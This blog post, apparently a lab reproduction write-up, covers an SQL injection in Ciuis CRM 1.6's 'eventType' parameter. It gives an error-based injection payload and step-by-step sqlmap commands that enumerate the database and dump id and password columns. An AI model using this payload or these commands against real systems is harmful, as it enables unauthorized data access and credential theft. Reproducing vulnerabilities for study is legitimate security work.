Ciuis CRM 1.6 - 'eventType' SQL Inj.复现

0x01 漏洞详情

===========================================================================================
# Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj.
# Dork: N/A
# Date: 27-05-2019
# Exploit Author: Mehmet EMİROĞLU
# Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489
# Software Link: https://codecanyon.net/item/ciuis-crm/20473489
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Ciuis CRM you can easily manage your customer relationships and save time on your business.
===========================================================================================
# POC - SQLi
# Parameters : eventType
# Attack Pattern :
-1+or+1%3d1+and(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# POST Method : http://localhost/ciuiscrm-16/calendar/addevent
===========================================================================================

0x02 漏洞复现

下载Ciuis CRM 1.6,搭建本地环境

点击CALENDAR,然后点添加按钮

随便填入东西,使用burpsuite抓包

eventType=1后面添加单引号,发包,出现报错信息,存在注入点

将请求信息保存下来(ciuis.txt)用sqlmap跑

python sqlmap.py -r F:\Desktop\ciuis.txt

查数据库
python sqlmap.py -r F:\Desktop\ciuis.txt --dbs

查表
python sqlmap.py -r F:\Desktop\ciuis.txt -D ciuis --tables

查字段
python sqlmap.py -r F:\Desktop\ciuis.txt -D ciuis -T tags --columns

dump出指定字段
python sqlmap.py -r F:\Desktop\ciuis.txt -D ciuis -T tags -C id,password --dump


参考文章

CiuisCRM 1.6 SQL Injection


   转载规则


《Ciuis CRM 1.6 - 'eventType' SQL Inj.复现》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
CVE-2018-11776漏洞复现 CVE-2018-11776漏洞复现
0x01 漏洞概述2018年8月23日,ApacheStrust2发布最新安全公告,ApacheStruts2 存在远程代码执行的高危漏洞,该漏洞由SemmleSecurity Researchteam的安全研究员汇报,漏洞编号为CVE-2
2019-08-02
下一篇 
WinRAR目录穿越漏洞复现 WinRAR目录穿越漏洞复现
0x01 漏洞概述该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而Wi
2019-07-26
  目录